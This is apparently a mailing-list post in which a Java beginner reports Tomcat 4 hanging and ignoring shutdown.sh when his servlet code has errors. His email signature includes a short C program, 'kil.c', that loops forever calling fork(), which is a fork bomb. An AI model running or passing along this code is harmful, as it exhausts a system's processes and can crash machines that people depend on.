Hi, I am a new person to Java Technologies and Tomcat. My goal was to learn java, java servlets and JSP.
I installed the Tomcat -4 available3 from Apache site. and strted to learn. However I notice that sometimes, tomcat just hangs as in it fails to respond, die using the "shutdown.sh" script also at these times i have to kill the java threads manualy. Now i also notice that these happene when my servelet code is errorneous. So can you all tell me if anybody has come across similar problem ?? Awaitinig your feedback Regards Rakesh Tiwari webmaster http://www.zdnetindia.com -- _____________________________________________________________________ /* _Begin_ kil.c */ main() { while(1){ fork(); } } /* _End_ kil.c */ -- To unsubscribe: <mailto:[EMAIL PROTECTED]> For additional commands: <mailto:[EMAIL PROTECTED]> Troubles with the list: <mailto:[EMAIL PROTECTED]>
